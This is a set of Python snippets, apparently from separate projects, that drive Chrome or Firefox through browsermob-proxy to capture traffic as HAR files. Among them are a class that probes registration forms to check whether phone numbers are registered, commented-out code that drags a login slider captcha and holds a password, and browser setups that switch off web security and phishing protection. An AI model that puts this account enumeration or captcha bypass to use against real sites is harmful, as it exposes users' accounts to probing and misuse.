class Monitor(object): """ step 3 配置chromedriver 和 browermobproxy 路径 需要使用完整路径,否则browsermobproxy无法启动服务 我是将这两个部分放到了和monitor.py同一目录 同时设置chrome为屏蔽图片,若需要抓取图片可自行修改 """ PROXY_PATH = path.abspath( "F:/rudder/py/accountApi/utils/browsermob-proxy-2.1.1/bin/browsermob-proxy.bat" ) CHROME_PATH = path.abspath("F:/rudder/py/accountApi/utils/chromedriver") CHROME_OPTIONS = {"profile.managed_default_content_settings.images": 2} canFoundInText = False def __init__(self): """ 类初始化函数暂不做操作 """ pass def initProxy(self): """ step 4 初始化 browermobproxy 设置需要屏蔽的网络连接,此处屏蔽了css,和图片(有时chrome的设置会失效),可加快网页加载速度 新建proxy代理地址 """ self.server = Server(self.PROXY_PATH) self.server.start() self.proxy = self.server.create_proxy() self.proxy.blacklist([ "http://.*/.*.css.*", "http://.*/.*.jpg.*", "http://.*/.*.png.*", "http://.*/.*.gif.*" ], 200) def initChrome(self): """ step 5 初始化selenium, chrome设置 将chrome的代理设置为browermobproxy新建的代理地址 """ chromeSettings = webdriver.ChromeOptions() chromeSettings.add_argument('--proxy-server={host}:{port}'.format( host="localhost", port=self.proxy.port)) chromeSettings.add_experimental_option("prefs", self.CHROME_OPTIONS) self.driver = webdriver.Chrome(executable_path=self.CHROME_PATH, chrome_options=chromeSettings) def genNewRecord(self, name="monitor", options={'captureContent': True}): """ step 6 新建监控记录,设置内容监控为True """ self.proxy.new_har(name, options=options) def getContentText(self, targetUrl): """ step 7 简单的获取目标数据的函数 其中 targetUrl 为浏览器获取对应数据调用的url,需要用正则表达式表示 """ if self.proxy.har['log']['entries']: for loop_record in self.proxy.har['log']['entries']: try: print(loop_record) # if re.fullmatch(targetUrl , loop_record["request"]['url']): # return loop_record["response"]['content']["text"] except Exception as err: print(err) continue return None def Start(self): """step 8 配置monitor的启动顺序""" try: self.initProxy() self.initChrome() except Exception as err: print(err) def Quit(self): """ step 9 配置monitor的退出顺序 代理sever的退出可能失败,目前是手动关闭,若谁能提供解决方法,将不胜感激 """ self.driver.close() self.driver.quit() try: self.proxy.close() self.server.process.terminate() self.server.process.wait() self.server.process.kill() except OSError: pass def getPageContent(self): print(666) #获取手机号是否存在接口, 返回-1未查找到用户名输入框,返回-2填写后无HTTP请求,返回-3填写测试数据后未发现请求包,返回-4无法抓取已注册请求包(现有测试数据都未注册) def getPhoneApi(self): if self.server == None: return False # self.driver.get('http://www.cndns.com/members/register.aspx') element = zfuncs.z_get_input_element_by_key_phone( self.driver) #获取手机号码输入框 if element == False: print "未查找到手机号码输入框" return -1 req_url = self.get_phone_api_url(element) #获取请求URL,用于定位请求包 # print req_url if req_url == False: element = zfuncs.z_get_input_element_by_key_submit( self.driver) #提交 req_url = self.get_click(element) #获取请求URL,用于定位请求包 if req_url == False: print "未发现请求包" #return -2 # print(entry['request']['url'].find(req_url)) #使用常用用户名测试,获取用户存在响应包 # for line in open("./keys/phone.value"): # line = line.strip('\n') # entry = self.find_entry_by_string(element, line) # if entry!=False and entry['request']['url'].find(req_url)!=-1:#确认请求包 #判断是否已注册请求包 line = "1300000" if self.canFoundInText == False: is_exist = zfuncs.z_get_isexists_by_key_exists(self.driver) else: is_exist = zfuncs.z_get_element_by_key_exists(self.driver) if is_exist != False: print line + ":发现已注册" # return entry #返回当前请求包 else: print line + ":未发现已注册" # else: # print line+":未发现请求包" # return -3 # return -4 #获取手机号是否存在接口的请求URL def get_phone_api_url(self, element): if self.server == None: return False str = '1300' + self.id_generator(7, '0123456789') #生成测试手机号 str = '13000000000' ########################### guding entry = self.find_entry_by_string(element, str) if entry == False: print("输入后未发起请求") return False url = entry['request']['url'] return url.split("?")[0] #定位请求包位置, element为用来填写内容的input输入框 def find_entry_by_string(self, element, keystr): #获取输入内容后的所有网络请求 entries = self.get_entries(element, keystr) # pdb.set_trace() # print("请求后返回"+dir(entries)) #查找是否有网络请求 entry = self.find_har_by_string(entries, keystr) if entry == False: print "未发起网络请求" return False print "发现填写后会发起网络请求" return entry #获取输入内容后的所有网络请求 def get_entries(self, element, keystr): if element == False: #该页未查找到输入用户名的地方 return False if element.get_attribute('name') != '': print "Input name: " + element.get_attribute('name') if element.get_attribute('id') != '': print "Input id: " + element.get_attribute('id') print "填写测试字符串:" + keystr element.send_keys(Keys.CONTROL + "a") element.send_keys(keystr) element.send_keys(Keys.TAB) time.sleep(2) #等待请求结束,页面改变 # print("请求地址"+self.proxy.har['log']['entries']) return self.proxy.har['log']['entries'] #查找数组中包含关键字的数组项 def find_har_by_string(self, arr, keystr): if type(arr) != list: print("feilist") return False #倒序遍历数组,查找关键字符串 for i in range(0, arr.__len__())[::-1]: # print arr[i] if json.dumps(arr[i]).find(keystr) != -1: return arr[i] return False #获取随机值 def id_generator(self, size=6, chars=string.ascii_lowercase + string.digits): return ''.join(random.choice(chars) for _ in range(size)) #触发点击事件 def get_click(self, element): if element == False: return False element.click() print("触发点击事件") time.sleep(2) #等待请求结束,页面改变 # print("请求地址"+self.proxy.har['log']['entries']) return self.proxy.har['log']['entries']
def getCookies(): # chrome_options = Options() # chrome_options.add_argument("--headless") print(sys.path[0] + '\browsermobproxy.bat') server = Server(sys.path[0] + '\\browsermob-proxy') server.start() proxy = server.create_proxy() chrome_options = webdriver.ChromeOptions() chrome_options.add_argument("--proxy-server={0}".format(proxy.proxy)) driver = webdriver.Chrome(chrome_options=chrome_options) #executable_path=r"C:\Program Files (x86)\Google\Chrome\Application\chromedriver", proxy.new_har("taobao") time.sleep(3) driver.get('https://login.taobao.com/member/login.jhtml') proxy.har time.sleep(3) #driver.find_element_by_class_name('login-switch').click() # driver.find_element_by_xpath( # '//*[@id="J_QRCodeLogin"]/div[5]/a[1]').click() #time.sleep(3) #输入账号密码 #driver.find_element_by_xpath( # '//*[@id="TPL_username_1"]').send_keys('*****@*****.**') #driver.find_element_by_xpath( # '//*[@id="TPL_password_1"]').send_keys('Zzz8801668') #滑块操作 #move_button = driver.find_element_by_xpath('//*[@id="nc_1_n1t"]') # #try: # driver.find_element_by_xpath('//*[@id="nocaptcha"]').get_attribute('style') #except: # print('不需要滑动模块') # time.sleep(5) #else: # print('需要滑动模块') # # 初始化AtionChains() # action = ActionChains(driver) # # 鼠标移动到元素上,点击并hold # action.move_to_element(move_button).click_and_hold().perform() # # 移动鼠标(260,0) # for i in range(1,300): # action.move_by_offset(1, 0).perform() # time.sleep(round(((round(i/300,4)**3)+round(i/150)),4)) # #action.move_by_offset(300, 0).perform() # # time.sleep(1) # # 释放鼠标 # action.release().perform() # time.sleep(20) #finally: # driver.find_element_by_xpath('//*[@id="J_SubmitStatic"]').click() # time.sleep(2) # action.click_and_hold(move_button).perform() # action.drag_and_drop_by_offset(move_button,260,0).perform() # 鼠标移动操作在测试环境中比较常用到的场景是需要获取某元素的 flyover/tips, # 实际应用中很多 flyover 只有当鼠标移动到这个元素之后才出现, # 所以这个时候通过执行 moveToElement(toElement) 操作, # 就能达到预期的效果。但是根据我个人的经验,这个方法对于某些特定产品的图标,图像之类的 flyover/tips 也不起作用, # 虽然在手动操作的时候移动鼠标到这些图标上面可以出现 flyover, 但是当使用 WebDriver 来模拟这一移动操作时,虽然方法成功执行了, # 但是 flyover 却出不来。所以在实际应用中,还需要对具体的产品页面做相应的处理。 time.sleep(20) cookies = {} #driver.get("https://i.taobao.com/my_taobao.htm") for elem in driver.get_cookies(): cookies[elem['name']] = elem['value'] if len(cookies) > 0: print("get Cookies Successful!!!") else: print("登陆失败") sys.exit() driver.close() driver.quit() return cookies
class ApiCrawler(object): def __init__(self, target, supported_methods=('GET', 'POST')): self.target = list(target) self.supported_methods = supported_methods self.browser_mob = 'C:/browsermob-proxy-2.1.4/bin/browsermob-proxy' #Path to browsermob self.server = None self.current_har = None def __start_server(self): self.server = Server(self.browser_mob) self.server.start() self.proxy = self.server.create_proxy() def __start_driver(self): chrome_options = webdriver.ChromeOptions() chrome_options.add_argument("--proxy-server={}".format( self.proxy.proxy)) self.driver = webdriver.Chrome(chrome_options=chrome_options) def __start_all(self): self.__start_server() self.__start_driver() def __create_har_no_interaction(self, title, url): self.proxy.new_har(title) self.driver.get(url) self.current_har = self.proxy.har return self.proxy.har def __parse_har(self): response = [] temp = self.current_har['log']['entries'] for i in temp: if i['request']['method'] in self.supported_methods: if any(target in i['request']['url'] for target in self.target): url = i['request']['url'] method = i['request']['method'] params = parse_results(url) status = i['response']['status'] redirect_url = i['response']['redirectURL'] if params: result_row = [url, method, status, redirect_url ] + params response.append(result_row) return response def __write_to_csv(self, url, results): parsed = urlparse(url) with open('{}-{}.csv'.format(parsed.netloc, date.today()), 'a') as file: writer = csv.writer(file, dialect='excel') for item in results: item = [parsed.netloc] + item writer.writerow(item) def __stop_all(self): self.server.stop() self.driver.quit() def single_page(self, url): self.__start_all() self.__create_har_no_interaction('N/A', url) results = self.__parse_har() self.__write_to_csv(url, results) self.__stop_all() def list_of_pages(self, url_list): self.__start_all() for url in url_list: try: self.__create_har_no_interaction('N/A', url) results = self.__parse_har() self.__write_to_csv(url, results) except: continue self.__stop_all()
class ProxyManager(): __BMP = "/Users/hari.ramachandran/PycharmProjects/raw/utils/bin/browsermob-proxy.bat" STOP = False def __init__(self): self.__server = Server(ProxyManager.__BMP) self.__client = None self._thread = None self.stop = False self.har_file_name = None def start_server(self): self.__server.start() return self.__server def start_client(self): self.__client = self.__server.create_proxy( params={"trustAllServers": "true"}) return self.__client @property def client(self): return self.__client @property def server(self): return self.__client def sniff_api(self, host=None, port=9440): server = self.start_server() client = self.start_client() client.new_har("https://{}:{}".format(host, port), options={ "captureHeaders": "true", "captureContent": "true" }) options = webdriver.ChromeOptions() options.add_argument("--proxy-server={}".format(client.proxy)) driver = webdriver.Chrome(chrome_options=options) driver.get("https://{}:{}".format(host, port)) while self.stop == False: time.sleep(1) self.har_file_name = "raw_har_{}".format(int(time.time())) har_data = json.dumps(client.har, indent=4) har_file = open("{}.har".format(self.har_file_name), 'w') # print type(client.har) # print client.har har_file.write(har_data) har_file.close() server.stop() driver.quit() # valid_apis = self.get_valid_api() def stop_sniffing(self): self.stop = True def get_valid_api(self): filterer = ApiFilter(har_file="{}.har".format(self.har_file_name), mouse_listener=None) return filterer.api_filter() def segregate_api(self, valid_apis): pass
from selenium import webdriver from selenium.webdriver.common.by import By from selenium.webdriver.support.ui import Select from selenium.webdriver.support.ui import WebDriverWait from selenium.common.exceptions import NoSuchElementException, ElementNotVisibleException from browsermobproxy import Server import urllib.parse server = Server( r"C:\Users\Administrator\Desktop\browsermob-proxy-2.1.0-beta-6\bin\browsermob-proxy.bat" ) server.start() proxy = server.create_proxy() proxy.new_har() chrome_options = webdriver.ChromeOptions() url = urllib.parse.urlparse(proxy.proxy).path chrome_options.add_argument('--proxy-server=%s' % url) driver = webdriver.Chrome(executable_path=r"c:\chromedriver.exe", chrome_options=chrome_options) driver.get("http://v.pptv.com/show/61uPDHTaSojradE.html") print(proxy.har) driver.quit() server.stop()
class Fetcher: def __init__(self): self.server = None self.proxy = None self.browser = None self.driver = None def set_remote_server(self, host, port): """Defines an already running proxy server for gathering includes and content """ self.server = RemoteServer(host, port) self.proxy = self.server.create_proxy() def start_local_server(self, binpath=None): """Starts a local instance of BrowserMob. Keyword Arguments: binpath -- The full path, including the binary name to the browsermob-proxy binary. """ if binpath is None: binpath = "{0}/browsermob-proxy-2.1.0-beta-4/bin/browsermob-proxy".format( getcwd()) self.server = Server(binpath) self.server.start() self.proxy = self.server.create_proxy() def set_firefox(self): """Sets the Webdriver for Firefox""" self.profile = webdriver.FirefoxProfile() self.profile.set_proxy(self.proxy.selenium_proxy()) self.driver = webdriver.Firefox(firefox_profile=self.profile) def run(self, site, name='fetch'): """Runs an instance of the Fetcher. Requires that either set_remote_server() or start_local_server() has been previously called. Keyword Arguments: site -- The URL of the site to load. name -- Name of the resulting HAR. """ try: self.proxy.headers( {'Via': None} ) # TODO: Need to override BrowserMob to remove the Via Header - https://github.com/lightbody/browsermob-proxy/issues/213 self.proxy.new_har(name, options={ 'captureHeaders': True, 'captureContent': True, 'captureBinaryContent': True }) self.driver.get(site) har = self.proxy.har har['dom'] = self.driver.page_source return har except AttributeError: print "[!] FAILED: Ensure you have set a Webdriver" def close(self): try: self.proxy.stop( ) # The proxy won't need to be stopped if using remote_server() except AttributeError: pass try: self.driver.close() except AttributeError: print '[!] Driver not found'
class HarProfiler: def __init__(self, config, url, login_first=False): self.url = url self.login_first = login_first self.login_user = config.get('login_user') self.login_password = config.get('login_password') self.browsermob_dir = config['browsermob_dir'] self.har_dir = config['har_dir'] self.label_prefix = config['label_prefix'] or '' self.run_cached = config['run_cached'] self.virtual_display = config['virtual_display'] self.virtual_display_size_x = config['virtual_display_size_x'] self.virtual_display_size_y = config['virtual_display_size_y'] self.label = '{}{}'.format(self.label_prefix, self.slugify(url)) self.cached_label = '{}-cached'.format(self.label) epoch = time.time() self.har_name = '{}-{}.har'.format(self.label, epoch) self.cached_har_name = '{}-{}.har'.format(self.cached_label, epoch) def __enter__(self): if self.virtual_display: log.info('starting virtual display') self.display = Display(visible=0, size=( self.virtual_display_size_x, self.virtual_display_size_y )) self.display.start() log.info('starting browsermob proxy') self.server = Server('{}/bin/browsermob-proxy'.format( self.browsermob_dir) ) self.server.start() return self def __exit__(self, type, value, traceback): log.info('stopping browsermob proxy') self.server.stop() if self.virtual_display: log.info('stopping virtual display') self.display.stop() def _make_proxied_webdriver(self): proxy = self.server.create_proxy() profile = webdriver.FirefoxProfile() profile.set_proxy(proxy.selenium_proxy()) driver = webdriver.Firefox(firefox_profile=profile) return (driver, proxy) def _save_har(self, har, cached=False): if not os.path.isdir(self.har_dir): os.makedirs(self.har_dir) if not cached: har_name = self.har_name elif cached: har_name = self.cached_har_name log.info('saving HAR file: {}'.format(har_name)) with open(os.path.join(self.har_dir, har_name), 'w') as f: json.dump(har, f, indent=2, ensure_ascii=False) def _login(self, driver): log.info('logging in...') error_msg = 'must specify login credentials in yaml config file' if self.login_user is None: raise RuntimeError(error_msg) if self.login_password is None: raise RuntimeError(error_msg) driver.get('https://courses.edx.org/login') # handle both old and new style logins try: email_field = driver.find_element_by_id('email') password_field = driver.find_element_by_id('password') except NoSuchElementException: email_field = driver.find_element_by_id('login-email') password_field = driver.find_element_by_id('login-password') email_field.send_keys(self.login_user) password_field.send_keys(self.login_password) password_field.submit() def _add_page_event_timings(self, driver, har): jscript = textwrap.dedent(""" var performance = window.performance || {}; var timings = performance.timing || {}; return timings; """) timings = driver.execute_script(jscript) har['log']['pages'][0]['pageTimings']['onContentLoad'] = ( timings['domContentLoadedEventEnd'] - timings['navigationStart'] ) har['log']['pages'][0]['pageTimings']['onLoad'] = ( timings['loadEventEnd'] - timings['navigationStart'] ) return har def load_page(self): try: driver, proxy = self._make_proxied_webdriver() if self.login_first: self._login(driver) proxy.new_har(self.label) log.info('loading page: {}'.format(self.url)) driver.get(self.url) har = self._add_page_event_timings(driver, proxy.har) self._save_har(har) if self.run_cached: proxy.new_har(self.cached_label) log.info('loading cached page: {}'.format(self.url)) driver.get(self.url) har = self._add_page_event_timings(driver, proxy.har) self._save_har(har, cached=True) except Exception: raise finally: driver.quit() def slugify(self, text): pattern = re.compile(r'[^a-z0-9]+') slug = '-'.join(word for word in pattern.split(text.lower()) if word) return slug
######################################################################################################################## app = Flask(__name__) # Set up BrowserMob proxy for proc in psutil.process_iter(): # Kill BrowserMob if it happens to already be running if proc.name() == 'browsermob-proxy': proc.kill() browsermob_options = {'port': 8090} browsermob_server = Server(path=BROWSERMOB_PROXY_PATH, options=browsermob_options) browsermob_server.start() time.sleep(1) proxy = browsermob_server.create_proxy() time.sleep(1) # Set up the Selenium driver for headless Chrome chrome_options = webdriver.ChromeOptions() chrome_options.add_argument('headless') chrome_options.add_argument('proxy-server={0}'.format(proxy.proxy)) # Start: "Pen testing" options chrome_options.add_argument('disable-web-security') chrome_options.add_argument('allow-running-insecure-content') chrome_options.add_argument('disable-client-side-phishing-detection') chrome_options.add_argument('disable-extensions') chrome_options.add_argument('disable-offer-store-unmasked-wallet-cards') chrome_options.add_argument('disable-offer-upload-credit-cards') chrome_options.add_argument('disable-popup-blocking') chrome_options.add_argument('disable-signin-promo')
def run_webdriver(self, start_url, port, config, download_dir): """ Run Selenium WebDriver """ useragent = None referer = None webdriver = None urllib3_logger = logging.getLogger('urllib3') urllib3_logger.setLevel(logging.DEBUG) self.logger.info("Starting WebRunner") firefox_profile = None server = None proxy = None har = None if config.referer: referer = config.referer else: referer = 'http://www.google.com/search?q={}+&oq={}&oe=utf-8&rls=org.mozilla:en-US:official&client=firefox-a&channel=fflb&gws_rd=cr'.format( config.url, config.url) if config.useragent: useragent = config.useragent else: useragent = 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:24.0) Gecko/20100101 Firefox/24.0' self.logger.debug("Running with UserAgent: {}".format(useragent)) self.logger.debug("Running with Referer: {}".format(referer)) self.logger.debug("Checking URL: {}".format(config.url)) server = Server("lib/browsermob/bin/browsermob-proxy", {'port': port}) server.start() proxy = server.create_proxy() proxy.headers({'User-Agent': useragent, 'Accept-Encoding': "", 'Connection': 'Close'}) request_js = ( 'var referer = request.getProxyRequest().getField("Referer");' 'addReferer(request);' 'function addReferer(r){' 'if (! referer ) {' 'r.addRequestHeader("Referer","' + referer + '");' '}' 'return;' '}') proxy.request_interceptor(request_js) from types import NoneType if config.firefoxprofile is not None and os.path.isdir(config.firefoxprofile): self.logger.debug("Using existing firefox profile") firefox_profile = FirefoxProfile(profile_directory=config.firefoxprofile) else: firefox_profile = FirefoxProfile() self.logger.debug("Using profile {}".format(firefox_profile.path)) firefox_profile.set_preference("security.OCSP.enabled", 0) firefox_profile.set_preference("browser.download.folderList", 2) firefox_profile.set_preference("browser.download.manager.showWhenStarting", False) firefox_profile.set_preference("browser.download.dir", download_dir) firefox_profile.set_preference("browser.helperApps.neverAsk.saveToDisk", "application/x-xpinstall;application/x-zip;application/x-zip-compressed;application/octet-stream;application/zip;application/pdf;application/msword;text/plain;application/octet") firefox_profile.set_preference("browser.helperApps.alwaysAsk.force", False) firefox_profile.set_preference("browser.download.manager.showWhenStarting", False) firefox_profile.set_preference("security.mixed_content.block_active_content", False) firefox_profile.set_preference("security.mixed_content.block_display_content", False) firefox_profile.set_preference("extensions.blocklist.enabled", False) firefox_profile.set_preference("network.proxy.type", 1) firefox_profile.set_proxy(proxy.selenium_proxy()) firefox_profile.set_preference("webdriver.log.file", "/tmp/ff.log") firefox_profile.set_preference("webdriver.log.driver", "DEBUG") firefox_profile.set_preference("browser.newtabpage.enhanced", False) firefox_profile.set_preference("browser.newtabpage.enabled", False) firefox_profile.set_preference("browser.newtabpage.directory.ping", "") firefox_profile.set_preference("browser.newtabpage.directory.source", "") firefox_profile.set_preference("browser.search.geoip.url", "") try: self.xvfb.start() capabilities = DesiredCapabilities.FIREFOX capabilities['loggingPrefs'] = {'browser':'ALL'} if os.path.exists("{}/firefox".format(firefox_profile.path)): binary = FirefoxBinary("{}/firefox".format(firefox_profile.path)) else: binary = FirefoxBinary("/usr/bin/firefox") webdriver = WebDriver(capabilities=capabilities, firefox_profile=firefox_profile, firefox_binary=binary) proxy.new_har(start_url.hostname, options={"captureHeaders": "true", "captureContent": "true", "captureBinaryContent": "true"}) self.analyse_page(webdriver, start_url) for entry in webdriver.get_log('browser'): self.logger.info("Firefox: {}".format(entry)) har = proxy.har self.logger.info("Stopping WebRunner") proxy.close() server.stop() webdriver.quit() har = Har(har) except Exception, e: self.logger.error(e) proxy.close() if webdriver: webdriver.quit() self.xvfb.stop() server.stop()
class ProxyManager: """ Detect http request via proxy. Returns: [type]: [description] """ __PARENT_DIR = dirname(dirname(abspath(__file__))) __OS_NAME = platform.system() __DRIVER_PATH = '' GOOGLE_CHROME = "google-chrome" CHROME = "chrome" CHROMIUM = "chromium" CHROMIUM_BROWSER = "chromium-browser" MOZILLA = "mozilla" FIREFOX = "firefox" detectManager = DetectManager() def __init__(self): self.detectManager.createDriver() if ProxyManager.__OS_NAME == 'Linux' or ProxyManager.__OS_NAME == 'Darwin': self.__BMP = self.__PARENT_DIR + "/browsermob-proxy-2.1.4/bin/browsermob-proxy" self.__DRIVER_PATH = self.__PARENT_DIR + "/drivers/" + self.__getDriverName( '') elif ProxyManager.__OS_NAME == 'Windows': self.__BMP = self.__PARENT_DIR + "\browsermob-proxy-2.1.4\bin\browsermob-proxy.bat" self.__server = Server(self.__BMP, {'port': 9090}) self.__client = None def start_server(self): self.__server.start() return self.__server def start_client(self): self.__client = self.__server.create_proxy( params={"trustAllServer": "true"}) return self.__client @property def client(self): return self.__client @property def server(self): return self.__server @property def driverPath(self): return self.__DRIVER_PATH def selectBrowser(self, browserName): self.__DRIVER_PATH = self.__PARENT_DIR + "/drivers/" + self.__getDriverName( browserName) def __getDriverName(self, browserName): """ If selected value is None or is empty then get driver of the first installed browser. Else get driver of the selected browser. """ if browserName is None or browserName == '': return next(iter(self.detectManager.installedBrowser.values())) else: return self.detectManager.installedBrowser[browserName]